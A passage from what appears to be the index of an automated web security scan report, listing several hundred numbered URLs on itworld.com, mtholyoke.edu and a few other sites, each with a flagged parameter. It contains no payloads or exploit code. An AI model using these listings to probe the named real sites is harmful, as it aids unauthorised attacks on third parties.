1.280. http://www.itworld.com/sites/all/modules/contrib/kickapps_comments/js/kickapps_comments.js [REST URL parameter 2]

1.281. http://www.itworld.com/sites/all/modules/contrib/kickapps_comments/js/kickapps_comments.js [REST URL parameter 3]

1.282. http://www.itworld.com/sites/all/modules/contrib/kickapps_comments/js/kickapps_comments.js [REST URL parameter 3]

1.283. http://www.itworld.com/sites/all/modules/contrib/kickapps_comments/js/kickapps_comments.js [REST URL parameter 4]

1.284. http://www.itworld.com/sites/all/modules/contrib/kickapps_comments/js/kickapps_comments.js [REST URL parameter 4]

1.285. http://www.itworld.com/sites/all/modules/contrib/kickapps_comments/js/kickapps_comments.js [REST URL parameter 5]

1.286. http://www.itworld.com/sites/all/modules/contrib/kickapps_comments/js/kickapps_comments.js [REST URL parameter 5]

1.287. http://www.itworld.com/sites/all/modules/contrib/kickapps_comments/js/kickapps_comments.js [REST URL parameter 6]

1.288. http://www.itworld.com/sites/all/modules/contrib/kickapps_comments/js/kickapps_comments.js [REST URL parameter 6]

1.289. http://www.itworld.com/sites/all/modules/contrib/kickapps_comments/js/kickapps_comments.js [REST URL parameter 7]

1.290. http://www.itworld.com/sites/all/modules/contrib/kickapps_comments/js/kickapps_comments.js [REST URL parameter 7]

1.291. http://www.itworld.com/sites/all/modules/contrib/mollom/mollom.js [REST URL parameter 1]

1.292. http://www.itworld.com/sites/all/modules/contrib/mollom/mollom.js [REST URL parameter 1]

1.293. http://www.itworld.com/sites/all/modules/contrib/mollom/mollom.js [REST URL parameter 3]

1.294. http://www.itworld.com/sites/all/modules/contrib/mollom/mollom.js [REST URL parameter 3]

1.295. http://www.itworld.com/sites/all/modules/contrib/mollom/mollom.js [REST URL parameter 4]

1.296. http://www.itworld.com/sites/all/modules/contrib/mollom/mollom.js [REST URL parameter 4]

1.297. http://www.itworld.com/sites/all/modules/contrib/mollom/mollom.js [REST URL parameter 6]

1.298. http://www.itworld.com/sites/all/modules/contrib/nice_menus/nice_menus.js [REST URL parameter 1]

1.299. http://www.itworld.com/sites/all/modules/contrib/nice_menus/nice_menus.js [REST URL parameter 1]

1.300. http://www.itworld.com/sites/all/modules/contrib/nice_menus/nice_menus.js [REST URL parameter 4]

1.301. http://www.itworld.com/sites/all/modules/contrib/nice_menus/nice_menus.js [REST URL parameter 4]

1.302. http://www.itworld.com/sites/all/modules/contrib/nice_menus/nice_menus.js [REST URL parameter 5]

1.303. http://www.itworld.com/sites/all/modules/contrib/nice_menus/nice_menus.js [REST URL parameter 5]

1.304. http://www.itworld.com/sites/all/modules/contrib/panels/js/panels.js [REST URL parameter 1]

1.305. http://www.itworld.com/sites/all/modules/contrib/panels/js/panels.js [REST URL parameter 1]

1.306. http://www.itworld.com/sites/all/modules/contrib/panels/js/panels.js [REST URL parameter 2]

1.307. http://www.itworld.com/sites/all/modules/contrib/panels/js/panels.js [REST URL parameter 2]

1.308. http://www.itworld.com/sites/all/modules/contrib/panels/js/panels.js [REST URL parameter 3]

1.309. http://www.itworld.com/sites/all/modules/contrib/panels/js/panels.js [REST URL parameter 3]

1.310. http://www.itworld.com/sites/all/modules/contrib/panels/js/panels.js [REST URL parameter 4]

1.311. http://www.itworld.com/sites/all/modules/contrib/panels/js/panels.js [REST URL parameter 4]

1.312. http://www.itworld.com/sites/all/modules/contrib/panels/js/panels.js [REST URL parameter 6]

1.313. http://www.itworld.com/sites/all/modules/contrib/panels/js/panels.js [REST URL parameter 7]

1.314. http://www.itworld.com/sites/all/modules/contrib/panels/js/panels.js [REST URL parameter 7]

1.315. http://www.itworld.com/sites/all/modules/contrib/views_slideshow/contrib/views_slideshow_singleframe/views_slideshow.js [REST URL parameter 3]

1.316. http://www.itworld.com/sites/all/modules/contrib/views_slideshow/contrib/views_slideshow_singleframe/views_slideshow.js [REST URL parameter 3]

1.317. http://www.itworld.com/sites/all/modules/contrib/views_slideshow/contrib/views_slideshow_singleframe/views_slideshow.js [REST URL parameter 4]

1.318. http://www.itworld.com/sites/all/modules/contrib/views_slideshow/contrib/views_slideshow_singleframe/views_slideshow.js [REST URL parameter 4]

1.319. http://www.itworld.com/sites/all/modules/contrib/views_slideshow/contrib/views_slideshow_singleframe/views_slideshow.js [REST URL parameter 5]

1.320. http://www.itworld.com/sites/all/modules/contrib/views_slideshow/contrib/views_slideshow_singleframe/views_slideshow.js [REST URL parameter 5]

1.321. http://www.itworld.com/sites/all/modules/contrib/views_slideshow/contrib/views_slideshow_singleframe/views_slideshow.js [REST URL parameter 7]

1.322. http://www.itworld.com/sites/all/modules/contrib/views_slideshow/contrib/views_slideshow_singleframe/views_slideshow.js [REST URL parameter 8]

1.323. http://www.itworld.com/sites/all/modules/contrib/views_slideshow/contrib/views_slideshow_singleframe/views_slideshow.js [REST URL parameter 8]

1.324. http://www.itworld.com/sites/all/modules/contrib/views_slideshow/contrib/views_slideshow_thumbnailhover/views_slideshow.js [REST URL parameter 1]

1.325. http://www.itworld.com/sites/all/modules/contrib/views_slideshow/contrib/views_slideshow_thumbnailhover/views_slideshow.js [REST URL parameter 1]

1.326. http://www.itworld.com/sites/all/modules/contrib/views_slideshow/contrib/views_slideshow_thumbnailhover/views_slideshow.js [REST URL parameter 3]

1.327. http://www.itworld.com/sites/all/modules/contrib/views_slideshow/contrib/views_slideshow_thumbnailhover/views_slideshow.js [REST URL parameter 3]

1.328. http://www.itworld.com/sites/all/modules/contrib/views_slideshow/contrib/views_slideshow_thumbnailhover/views_slideshow.js [REST URL parameter 4]

1.329. http://www.itworld.com/sites/all/modules/contrib/views_slideshow/contrib/views_slideshow_thumbnailhover/views_slideshow.js [REST URL parameter 4]

1.330. http://www.itworld.com/sites/all/modules/contrib/views_slideshow/contrib/views_slideshow_thumbnailhover/views_slideshow.js [REST URL parameter 5]

1.331. http://www.itworld.com/sites/all/modules/contrib/views_slideshow/contrib/views_slideshow_thumbnailhover/views_slideshow.js [REST URL parameter 5]

1.332. http://www.itworld.com/sites/all/modules/contrib/views_slideshow/contrib/views_slideshow_thumbnailhover/views_slideshow.js [REST URL parameter 7]

1.333. http://www.itworld.com/sites/all/modules/contrib/views_slideshow/contrib/views_slideshow_thumbnailhover/views_slideshow.js [REST URL parameter 8]

1.334. http://www.itworld.com/sites/all/modules/contrib/views_slideshow/contrib/views_slideshow_thumbnailhover/views_slideshow.js [REST URL parameter 8]

1.335. http://www.itworld.com/sites/all/modules/contrib/views_slideshow/js/jquery.cycle.all.min.js [REST URL parameter 2]

1.336. http://www.itworld.com/sites/all/modules/contrib/views_slideshow/js/jquery.cycle.all.min.js [REST URL parameter 2]

1.337. http://www.itworld.com/sites/all/modules/contrib/views_slideshow/js/jquery.cycle.all.min.js [REST URL parameter 3]

1.338. http://www.itworld.com/sites/all/modules/contrib/views_slideshow/js/jquery.cycle.all.min.js [REST URL parameter 3]

1.339. http://www.itworld.com/sites/all/modules/contrib/views_slideshow/js/jquery.cycle.all.min.js [REST URL parameter 5]

1.340. http://www.itworld.com/sites/all/modules/contrib/views_slideshow/js/jquery.cycle.all.min.js [REST URL parameter 6]

1.341. http://www.itworld.com/sites/all/modules/contrib/views_slideshow/js/jquery.cycle.all.min.js [REST URL parameter 6]

1.342. http://www.itworld.com/sites/all/modules/contrib/views_slideshow/js/jquery.cycle.all.min.js [REST URL parameter 7]

1.343. http://www.itworld.com/sites/all/modules/contrib/views_slideshow/js/jquery.cycle.all.min.js [REST URL parameter 7]

1.344. http://www.itworld.com/sites/all/modules/contrib/viewscarousel/jquery.jcarousel.pack.js [REST URL parameter 3]

1.345. http://www.itworld.com/sites/all/modules/contrib/viewscarousel/jquery.jcarousel.pack.js [REST URL parameter 3]

1.346. http://www.itworld.com/sites/all/modules/contrib/viewscarousel/jquery.jcarousel.pack.js [REST URL parameter 4]

1.347. http://www.itworld.com/sites/all/modules/contrib/viewscarousel/jquery.jcarousel.pack.js [REST URL parameter 4]

1.348. http://www.itworld.com/sites/all/modules/contrib/viewscarousel/jquery.jcarousel.pack.js [REST URL parameter 6]

1.349. http://www.itworld.com/sites/all/modules/contrib/viewscarousel/viewscarousel.js [REST URL parameter 1]

1.350. http://www.itworld.com/sites/all/modules/contrib/viewscarousel/viewscarousel.js [REST URL parameter 1]

1.351. http://www.itworld.com/sites/all/modules/contrib/viewscarousel/viewscarousel.js [REST URL parameter 4]

1.352. http://www.itworld.com/sites/all/modules/contrib/viewscarousel/viewscarousel.js [REST URL parameter 4]

1.353. http://www.itworld.com/sites/all/modules/contrib/viewscarousel/viewscarousel.js [REST URL parameter 5]

1.354. http://www.itworld.com/sites/all/modules/contrib/viewscarousel/viewscarousel.js [REST URL parameter 5]

1.355. http://www.itworld.com/sites/all/modules/features/itw_activity/js/itw_activity.js [REST URL parameter 3]

1.356. http://www.itworld.com/sites/all/modules/features/itw_activity/js/itw_activity.js [REST URL parameter 3]

1.357. http://www.itworld.com/sites/all/modules/features/itw_activity/js/itw_activity.js [REST URL parameter 5]

1.358. http://www.itworld.com/sites/all/modules/features/itw_activity/js/itw_activity.js [REST URL parameter 6]

1.359. http://www.itworld.com/sites/all/modules/features/itw_activity/js/itw_activity.js [REST URL parameter 6]

1.360. http://www.itworld.com/sites/all/modules/features/itw_activity/js/itw_activity.js [REST URL parameter 7]

1.361. http://www.itworld.com/sites/all/modules/features/itw_activity/js/itw_activity.js [REST URL parameter 7]

1.362. http://www.itworld.com/sites/all/modules/features/itw_answers/js/itw_answers.js [REST URL parameter 3]

1.363. http://www.itworld.com/sites/all/modules/features/itw_answers/js/itw_answers.js [REST URL parameter 3]

1.364. http://www.itworld.com/sites/all/modules/features/itw_answers/js/itw_answers.js [REST URL parameter 4]

1.365. http://www.itworld.com/sites/all/modules/features/itw_answers/js/itw_answers.js [REST URL parameter 4]

1.366. http://www.itworld.com/sites/all/modules/features/itw_answers/js/itw_answers.js [REST URL parameter 6]

1.367. http://www.itworld.com/sites/all/modules/features/itw_answers/js/itw_answers.js [REST URL parameter 7]

1.368. http://www.itworld.com/sites/all/modules/features/itw_answers/js/itw_answers.js [REST URL parameter 7]

1.369. http://www.itworld.com/sites/all/modules/itw/modules/friendconnect/friendconnect.js [REST URL parameter 1]

1.370. http://www.itworld.com/sites/all/modules/itw/modules/friendconnect/friendconnect.js [REST URL parameter 1]

1.371. http://www.itworld.com/sites/all/modules/itw/modules/friendconnect/friendconnect.js [REST URL parameter 4]

1.372. http://www.itworld.com/sites/all/modules/itw/modules/friendconnect/friendconnect.js [REST URL parameter 5]

1.373. http://www.itworld.com/sites/all/modules/itw/modules/friendconnect/friendconnect.js [REST URL parameter 5]

1.374. http://www.itworld.com/sites/all/modules/itw/modules/friendconnect/friendconnect.js [REST URL parameter 6]

1.375. http://www.itworld.com/sites/all/modules/itw/modules/friendconnect/friendconnect.js [REST URL parameter 6]

1.376. http://www.itworld.com/sites/all/modules/itw/modules/friendconnect/friendconnect.js [REST URL parameter 7]

1.377. http://www.itworld.com/sites/all/modules/itw/modules/friendconnect/friendconnect.js [REST URL parameter 7]

1.378. http://www.itworld.com/sites/all/modules/itw/modules/idg_ads/demandbase/demandbase-multiver-1.3/demandbase.js [REST URL parameter 2]

1.379. http://www.itworld.com/sites/all/modules/itw/modules/idg_ads/demandbase/demandbase-multiver-1.3/demandbase.js [REST URL parameter 2]

1.380. http://www.itworld.com/sites/all/modules/itw/modules/idg_ads/demandbase/demandbase-multiver-1.3/demandbase.js [REST URL parameter 3]

1.381. http://www.itworld.com/sites/all/modules/itw/modules/idg_ads/demandbase/demandbase-multiver-1.3/demandbase.js [REST URL parameter 3]

1.382. http://www.itworld.com/sites/all/modules/itw/modules/idg_ads/demandbase/demandbase-multiver-1.3/demandbase.js [REST URL parameter 4]

1.383. http://www.itworld.com/sites/all/modules/itw/modules/idg_ads/demandbase/demandbase-multiver-1.3/demandbase.js [REST URL parameter 4]

1.384. http://www.itworld.com/sites/all/modules/itw/modules/idg_ads/demandbase/demandbase-multiver-1.3/demandbase.js [REST URL parameter 6]

1.385. http://www.itworld.com/sites/all/modules/itw/modules/idg_ads/demandbase/demandbase-multiver-1.3/demandbase.js [REST URL parameter 7]

1.386. http://www.itworld.com/sites/all/modules/itw/modules/idg_ads/demandbase/demandbase-multiver-1.3/demandbase.js [REST URL parameter 7]

1.387. http://www.itworld.com/sites/all/modules/itw/modules/idg_ads/demandbase/demandbase-multiver-1.3/demandbase.js [REST URL parameter 8]

1.388. http://www.itworld.com/sites/all/modules/itw/modules/idg_ads/demandbase/demandbase-multiver-1.3/demandbase.js [REST URL parameter 8]

1.389. http://www.itworld.com/sites/all/modules/itw/modules/idg_ads/demandbase/demandbase-multiver-1.3/demandbase.js [REST URL parameter 9]

1.390. http://www.itworld.com/sites/all/modules/itw/modules/idg_ads/demandbase/demandbase-multiver-1.3/demandbase.js [REST URL parameter 9]

1.391. http://www.itworld.com/sites/all/modules/itw/modules/idg_ads/doubleclick_ads/doubleclick_ads-multiver-2.5.4/doubleclick_ads.js [REST URL parameter 1]

1.392. http://www.itworld.com/sites/all/modules/itw/modules/idg_ads/doubleclick_ads/doubleclick_ads-multiver-2.5.4/doubleclick_ads.js [REST URL parameter 1]

1.393. http://www.itworld.com/sites/all/modules/itw/modules/idg_ads/doubleclick_ads/doubleclick_ads-multiver-2.5.4/doubleclick_ads.js [REST URL parameter 4]

1.394. http://www.itworld.com/sites/all/modules/itw/modules/idg_ads/doubleclick_ads/doubleclick_ads-multiver-2.5.4/doubleclick_ads.js [REST URL parameter 4]

1.395. http://www.itworld.com/sites/all/modules/itw/modules/idg_ads/doubleclick_ads/doubleclick_ads-multiver-2.5.4/doubleclick_ads.js [REST URL parameter 5]

1.396. http://www.itworld.com/sites/all/modules/itw/modules/idg_ads/doubleclick_ads/doubleclick_ads-multiver-2.5.4/doubleclick_ads.js [REST URL parameter 5]

1.397. http://www.itworld.com/sites/all/modules/itw/modules/idg_ads/doubleclick_ads/doubleclick_ads-multiver-2.5.4/doubleclick_ads.js [REST URL parameter 6]

1.398. http://www.itworld.com/sites/all/modules/itw/modules/idg_ads/doubleclick_ads/doubleclick_ads-multiver-2.5.4/doubleclick_ads.js [REST URL parameter 6]

1.399. http://www.itworld.com/sites/all/modules/itw/modules/idg_ads/doubleclick_ads/doubleclick_ads-multiver-2.5.4/doubleclick_ads.js [REST URL parameter 7]

1.400. http://www.itworld.com/sites/all/modules/itw/modules/idg_ads/doubleclick_ads/doubleclick_ads-multiver-2.5.4/doubleclick_ads.js [REST URL parameter 7]

1.401. http://www.itworld.com/sites/all/modules/itw/modules/idg_ads/doubleclick_ads/doubleclick_ads-multiver-2.5.4/doubleclick_ads.js [REST URL parameter 8]

1.402. http://www.itworld.com/sites/all/modules/itw/modules/idg_ads/doubleclick_ads/doubleclick_ads-multiver-2.5.4/doubleclick_ads.js [REST URL parameter 8]

1.403. http://www.itworld.com/sites/all/modules/itw/modules/idg_ads/doubleclick_ads/doubleclick_ads-multiver-2.5.4/doubleclick_ads.js [REST URL parameter 9]

1.404. http://www.itworld.com/sites/all/modules/itw/modules/idg_ads/doubleclick_ads/doubleclick_ads-multiver-2.5.4/doubleclick_ads.js [REST URL parameter 9]

1.405. http://www.itworld.com/sites/all/modules/itw/modules/itw_login/itw_login.js [REST URL parameter 1]

1.406. http://www.itworld.com/sites/all/modules/itw/modules/itw_login/itw_login.js [REST URL parameter 1]

1.407. http://www.itworld.com/sites/all/modules/itw/modules/itw_login/itw_login.js [REST URL parameter 4]

1.408. http://www.itworld.com/sites/all/modules/itw/modules/itw_login/itw_login.js [REST URL parameter 4]

1.409. http://www.itworld.com/sites/all/modules/itw/modules/itw_login/itw_login.js [REST URL parameter 5]

1.410. http://www.itworld.com/sites/all/modules/itw/modules/itw_login/itw_login.js [REST URL parameter 5]

1.411. http://www.itworld.com/sites/all/modules/itw/modules/itw_login/itw_login.js [REST URL parameter 7]

1.412. http://www.itworld.com/sites/all/modules/itw/modules/itw_profiles/itw_profiles.css [REST URL parameter 1]

1.413. http://www.itworld.com/sites/all/modules/itw/modules/itw_profiles/itw_profiles.css [REST URL parameter 1]

1.414. http://www.itworld.com/sites/all/modules/itw/modules/itw_profiles/itw_profiles.css [REST URL parameter 2]

1.415. http://www.itworld.com/sites/all/modules/itw/modules/itw_profiles/itw_profiles.css [REST URL parameter 2]

1.416. http://www.itworld.com/sites/all/modules/itw/modules/itw_profiles/itw_profiles.css [REST URL parameter 6]

1.417. http://www.itworld.com/sites/all/modules/itw/modules/itw_profiles/itw_profiles.css [REST URL parameter 7]

1.418. http://www.itworld.com/sites/all/modules/itw/modules/itw_profiles/itw_profiles.css [REST URL parameter 7]

1.419. http://www.itworld.com/sites/all/modules/itw/modules/itw_profiles/itw_profiles.js [REST URL parameter 3]

1.420. http://www.itworld.com/sites/all/modules/itw/modules/itw_profiles/itw_profiles.js [REST URL parameter 3]

1.421. http://www.itworld.com/sites/all/modules/itw/modules/itw_profiles/itw_profiles.js [REST URL parameter 5]

1.422. http://www.itworld.com/sites/all/modules/itw/modules/itw_profiles/itw_profiles.js [REST URL parameter 6]

1.423. http://www.itworld.com/sites/all/modules/itw/modules/itw_profiles/itw_profiles.js [REST URL parameter 6]

1.424. http://www.itworld.com/sites/all/modules/itw/modules/itw_profiles/itw_profiles.js [REST URL parameter 7]

1.425. http://www.itworld.com/sites/all/modules/itw/modules/itw_profiles/itw_profiles.js [REST URL parameter 7]

1.426. http://www.itworld.com/sites/all/modules/itw/modules/itw_sharebar/js/sharebar.js [REST URL parameter 1]

1.427. http://www.itworld.com/sites/all/modules/itw/modules/itw_sharebar/js/sharebar.js [REST URL parameter 1]

1.428. http://www.itworld.com/sites/all/modules/itw/modules/itw_sharebar/js/sharebar.js [REST URL parameter 2]

1.429. http://www.itworld.com/sites/all/modules/itw/modules/itw_sharebar/js/sharebar.js [REST URL parameter 2]

1.430. http://www.itworld.com/sites/all/modules/itw/modules/itw_sharebar/js/sharebar.js [REST URL parameter 3]

1.431. http://www.itworld.com/sites/all/modules/itw/modules/itw_sharebar/js/sharebar.js [REST URL parameter 3]

1.432. http://www.itworld.com/sites/all/modules/itw/modules/itw_sharebar/js/sharebar.js [REST URL parameter 4]

1.433. http://www.itworld.com/sites/all/modules/itw/modules/itw_sharebar/js/sharebar.js [REST URL parameter 4]

1.434. http://www.itworld.com/sites/all/modules/itw/modules/itw_sharebar/js/sharebar.js [REST URL parameter 5]

1.435. http://www.itworld.com/sites/all/modules/itw/modules/itw_sharebar/js/sharebar.js [REST URL parameter 5]

1.436. http://www.itworld.com/sites/all/modules/itw/modules/itw_sharebar/js/sharebar.js [REST URL parameter 6]

1.437. http://www.itworld.com/sites/all/modules/itw/modules/itw_sharebar/js/sharebar.js [REST URL parameter 6]

1.438. http://www.itworld.com/sites/all/modules/itw/modules/itw_sharebar/js/sharebar.js [REST URL parameter 7]

1.439. http://www.itworld.com/sites/all/modules/itw/modules/itw_sharebar/js/sharebar.js [REST URL parameter 7]

1.440. http://www.itworld.com/sites/all/modules/itw/modules/itw_sharebar/js/sharebar.js [REST URL parameter 8]

1.441. http://www.itworld.com/sites/all/modules/itw/modules/itw_sharebar/js/sharebar.js [REST URL parameter 8]

1.442. http://www.itworld.com/sites/all/modules/itw/modules/lyris/js/jquery.bgiframe.js [REST URL parameter 1]

1.443. http://www.itworld.com/sites/all/modules/itw/modules/lyris/js/jquery.bgiframe.js [REST URL parameter 1]

1.444. http://www.itworld.com/sites/all/modules/itw/modules/lyris/js/jquery.bgiframe.js [REST URL parameter 3]

1.445. http://www.itworld.com/sites/all/modules/itw/modules/lyris/js/jquery.bgiframe.js [REST URL parameter 4]

1.446. http://www.itworld.com/sites/all/modules/itw/modules/lyris/js/jquery.bgiframe.js [REST URL parameter 4]

1.447. http://www.itworld.com/sites/all/modules/itw/modules/lyris/js/jquery.bgiframe.js [REST URL parameter 5]

1.448. http://www.itworld.com/sites/all/modules/itw/modules/lyris/js/jquery.bgiframe.js [REST URL parameter 5]

1.449. http://www.itworld.com/sites/all/modules/itw/modules/lyris/js/jquery.bgiframe.js [REST URL parameter 6]

1.450. http://www.itworld.com/sites/all/modules/itw/modules/lyris/js/jquery.bgiframe.js [REST URL parameter 6]

1.451. http://www.itworld.com/sites/all/modules/itw/modules/lyris/js/jquery.bgiframe.js [REST URL parameter 7]

1.452. http://www.itworld.com/sites/all/modules/itw/modules/lyris/js/jquery.bgiframe.js [REST URL parameter 7]

1.453. http://www.itworld.com/sites/all/modules/itw/modules/lyris/js/jquery.bgiframe.js [REST URL parameter 8]

1.454. http://www.itworld.com/sites/all/modules/itw/modules/lyris/js/jquery.bgiframe.js [REST URL parameter 8]

1.455. http://www.itworld.com/sites/all/modules/itw/modules/lyris/js/jquery.delegate.js [REST URL parameter 3]

1.456. http://www.itworld.com/sites/all/modules/itw/modules/lyris/js/jquery.delegate.js [REST URL parameter 3]

1.457. http://www.itworld.com/sites/all/modules/itw/modules/lyris/js/jquery.delegate.js [REST URL parameter 5]

1.458. http://www.itworld.com/sites/all/modules/itw/modules/lyris/js/jquery.delegate.js [REST URL parameter 6]

1.459. http://www.itworld.com/sites/all/modules/itw/modules/lyris/js/jquery.delegate.js [REST URL parameter 6]

1.460. http://www.itworld.com/sites/all/modules/itw/modules/lyris/js/jquery.delegate.js [REST URL parameter 7]

1.461. http://www.itworld.com/sites/all/modules/itw/modules/lyris/js/jquery.delegate.js [REST URL parameter 7]

1.462. http://www.itworld.com/sites/all/modules/itw/modules/lyris/js/jquery.delegate.js [REST URL parameter 8]

1.463. http://www.itworld.com/sites/all/modules/itw/modules/lyris/js/jquery.delegate.js [REST URL parameter 8]

1.464. http://www.itworld.com/sites/all/modules/itw/modules/lyris/js/lyris.js [REST URL parameter 1]

1.465. http://www.itworld.com/sites/all/modules/itw/modules/lyris/js/lyris.js [REST URL parameter 1]

1.466. http://www.itworld.com/sites/all/modules/itw/modules/lyris/js/lyris.js [REST URL parameter 3]

1.467. http://www.itworld.com/sites/all/modules/itw/modules/lyris/js/lyris.js [REST URL parameter 3]

1.468. http://www.itworld.com/sites/all/modules/itw/modules/lyris/js/lyris.js [REST URL parameter 4]

1.469. http://www.itworld.com/sites/all/modules/itw/modules/lyris/js/lyris.js [REST URL parameter 4]

1.470. http://www.itworld.com/sites/all/modules/itw/modules/lyris/js/lyris.js [REST URL parameter 6]

1.471. http://www.itworld.com/sites/all/modules/itw/modules/lyris/js/lyris.js [REST URL parameter 7]

1.472. http://www.itworld.com/sites/all/modules/itw/modules/lyris/js/lyris.js [REST URL parameter 7]

1.473. http://www.itworld.com/sites/all/modules/itw/modules/lyris/js/lyris.js [REST URL parameter 8]

1.474. http://www.itworld.com/sites/all/modules/itw/modules/lyris/js/lyris.js [REST URL parameter 8]

1.475. http://www.itworld.com/sites/all/themes/itworld/js/carousel_display.js [REST URL parameter 3]

1.476. http://www.itworld.com/sites/all/themes/itworld/js/carousel_display.js [REST URL parameter 3]

1.477. http://www.itworld.com/sites/all/themes/itworld/js/carousel_display.js [REST URL parameter 4]

1.478. http://www.itworld.com/sites/all/themes/itworld/js/carousel_display.js [REST URL parameter 4]

1.479. http://www.itworld.com/sites/all/themes/itworld/js/carousel_display.js [REST URL parameter 6]

1.480. http://www.itworld.com/sites/all/themes/itworld/js/ifoldie.js [REST URL parameter 3]

1.481. http://www.itworld.com/sites/all/themes/itworld/js/ifoldie.js [REST URL parameter 3]

1.482. http://www.itworld.com/sites/all/themes/itworld/js/ifoldie.js [REST URL parameter 5]

1.483. http://www.itworld.com/sites/all/themes/itworld/js/ifoldie.js [REST URL parameter 6]

1.484. http://www.itworld.com/sites/all/themes/itworld/js/ifoldie.js [REST URL parameter 6]

1.485. http://www.itworld.com/sites/all/themes/itworld/js/inlineFieldLabel.js [REST URL parameter 1]

1.486. http://www.itworld.com/sites/all/themes/itworld/js/inlineFieldLabel.js [REST URL parameter 1]

1.487. http://www.itworld.com/sites/all/themes/itworld/js/inlineFieldLabel.js [REST URL parameter 3]

1.488. http://www.itworld.com/sites/all/themes/itworld/js/inlineFieldLabel.js [REST URL parameter 3]

1.489. http://www.itworld.com/sites/all/themes/itworld/js/inlineFieldLabel.js [REST URL parameter 4]

1.490. http://www.itworld.com/sites/all/themes/itworld/js/inlineFieldLabel.js [REST URL parameter 4]

1.491. http://www.itworld.com/sites/all/themes/itworld/js/inlineFieldLabel.js [REST URL parameter 5]

1.492. http://www.itworld.com/sites/all/themes/itworld/js/inlineFieldLabel.js [REST URL parameter 5]

1.493. http://www.itworld.com/sites/all/themes/itworld/js/inlineFieldLabel.js [REST URL parameter 6]

1.494. http://www.itworld.com/sites/all/themes/itworld/js/inlineFieldLabel.js [REST URL parameter 6]

1.495. http://www.itworld.com/sites/all/themes/itworld/js/itw_script.js [REST URL parameter 2]

1.496. http://www.itworld.com/sites/all/themes/itworld/js/itw_script.js [REST URL parameter 2]

1.497. http://www.itworld.com/sites/all/themes/itworld/js/itw_script.js [REST URL parameter 4]

1.498. http://www.itworld.com/sites/all/themes/itworld/js/itw_script.js [REST URL parameter 5]

1.499. http://www.itworld.com/sites/all/themes/itworld/js/itw_script.js [REST URL parameter 5]

1.500. http://www.itworld.com/sites/all/themes/itworld/js/itw_script.js [REST URL parameter 6]

1.501. http://www.itworld.com/sites/all/themes/itworld/js/itw_script.js [REST URL parameter 6]

1.502. http://www.itworld.com/sites/all/themes/itworld/js/jquery.validate.js [REST URL parameter 1]

1.503. http://www.itworld.com/sites/all/themes/itworld/js/jquery.validate.js [REST URL parameter 1]

1.504. http://www.itworld.com/sites/all/themes/itworld/js/jquery.validate.js [REST URL parameter 3]

1.505. http://www.itworld.com/sites/all/themes/itworld/js/jquery.validate.js [REST URL parameter 3]

1.506. http://www.itworld.com/sites/all/themes/itworld/js/jquery.validate.js [REST URL parameter 5]

1.507. http://www.itworld.com/sites/all/themes/itworld/js/jquery.validate.js [REST URL parameter 6]

1.508. http://www.itworld.com/sites/all/themes/itworld/js/jquery.validate.js [REST URL parameter 6]

1.509. http://www.itworld.com/sites/all/themes/itworld/js/mosttabs.js [REST URL parameter 1]

1.510. http://www.itworld.com/sites/all/themes/itworld/js/mosttabs.js [REST URL parameter 1]

1.511. http://www.itworld.com/sites/all/themes/itworld/js/mosttabs.js [REST URL parameter 4]

1.512. http://www.itworld.com/sites/all/themes/itworld/js/mosttabs.js [REST URL parameter 4]

1.513. http://www.itworld.com/sites/all/themes/itworld/js/mosttabs.js [REST URL parameter 5]

1.514. http://www.itworld.com/sites/all/themes/itworld/js/mosttabs.js [REST URL parameter 5]

1.515. http://www.itworld.com/sites/all/themes/itworld/js/node.js [REST URL parameter 3]

1.516. http://www.itworld.com/sites/all/themes/itworld/js/node.js [REST URL parameter 3]

1.517. http://www.itworld.com/sites/all/themes/itworld/js/node.js [REST URL parameter 5]

1.518. http://www.itworld.com/sites/all/themes/itworld/js/node.js [REST URL parameter 6]

1.519. http://www.itworld.com/sites/all/themes/itworld/js/node.js [REST URL parameter 6]

1.520. http://www.lijit.com/delivery/fp [n parameter]

1.521. http://www.linkedin.com/countserv/count/share [url parameter]

1.522. http://www.mtholyoke.edu/favicon.ico [REST URL parameter 1]

1.523. http://www.mtholyoke.edu/homepage_slideshow/home_slideshow.swf [REST URL parameter 1]

1.524. http://www.mtholyoke.edu/homepage_slideshow/home_slideshow.swf [REST URL parameter 2]

1.525. http://www.mtholyoke.edu/index.html [REST URL parameter 1]

1.526. http://www.mtholyoke.edu/lits/7727.shtml [REST URL parameter 1]

1.527. http://www.mtholyoke.edu/lits/7727.shtml [REST URL parameter 2]

1.528. http://www.mtholyoke.edu/lits/learn/resources_faculty.html [REST URL parameter 1]

1.529. http://www.mtholyoke.edu/lits/learn/resources_faculty.html [REST URL parameter 2]

1.530. http://www.mtholyoke.edu/lits/learn/resources_faculty.html [REST URL parameter 3]

1.531. http://www.mtholyoke.edu/lits/network/ [REST URL parameter 1]

1.532. http://www.mtholyoke.edu/lits/network/ [REST URL parameter 2]

1.533. http://www.mtholyoke.edu/news/image_assets/0001/8200/TaliTh_thumb.jpg [REST URL parameter 1]

1.534. http://www.mtholyoke.edu/news/image_assets/0001/8212/suzan-lori_thumb_thumb.jpg [REST URL parameter 1]

1.535. http://www.mtholyoke.edu/news/image_assets/0001/8224/sanborn75_thumb.jpg [REST URL parameter 1]

1.536. http://www.mtholyoke.edu/news/image_assets/0001/8252/religion_thumb_thumb.jpg [REST URL parameter 1]

1.537. http://www.mtholyoke.edu/news/image_assets/0001/8276/Karen_Remmler-thumb_thumb.jpg [REST URL parameter 1]

1.538. http://www.mtholyoke.edu/news/image_assets/0001/8292/convo_thumb_thumb.jpg [REST URL parameter 1]

1.539. http://www.mtholyoke.edu/news/image_assets/0001/8300/banana-TH_thumb.jpg [REST URL parameter 1]

1.540. http://www.mtholyoke.edu/news/image_assets/0001/8312/allgor_thumb.jpg [REST URL parameter 1]

1.541. http://www.mtholyoke.edu/news/image_assets/0001/8316/Humera-Afridi_thumb.jpg [REST URL parameter 1]

1.542. http://www.mtholyoke.edu/news/image_assets/0001/8320/sutphen_thumb_thumb.jpg [REST URL parameter 1]

1.543. http://www.mtholyoke.edu/news/image_assets/0001/8328/roksa_thumb_thumb.jpg [REST URL parameter 1]

1.544. http://www.mtholyoke.edu/news/image_assets/0001/8336/hewitt_thumb_thumb.jpg [REST URL parameter 1]

1.545. http://www.mtholyoke.edu/news/image_assets/0001/8344/kelley_thumb_thumb.jpg [REST URL parameter 1]

1.546. http://www.mtholyoke.edu/news/image_assets/0001/8352/flag_thumb.jpg [REST URL parameter 1]

1.547. http://www.mtholyoke.edu/news/image_assets/0001/8356/remmler_thumb_thumb.jpg [REST URL parameter 1]

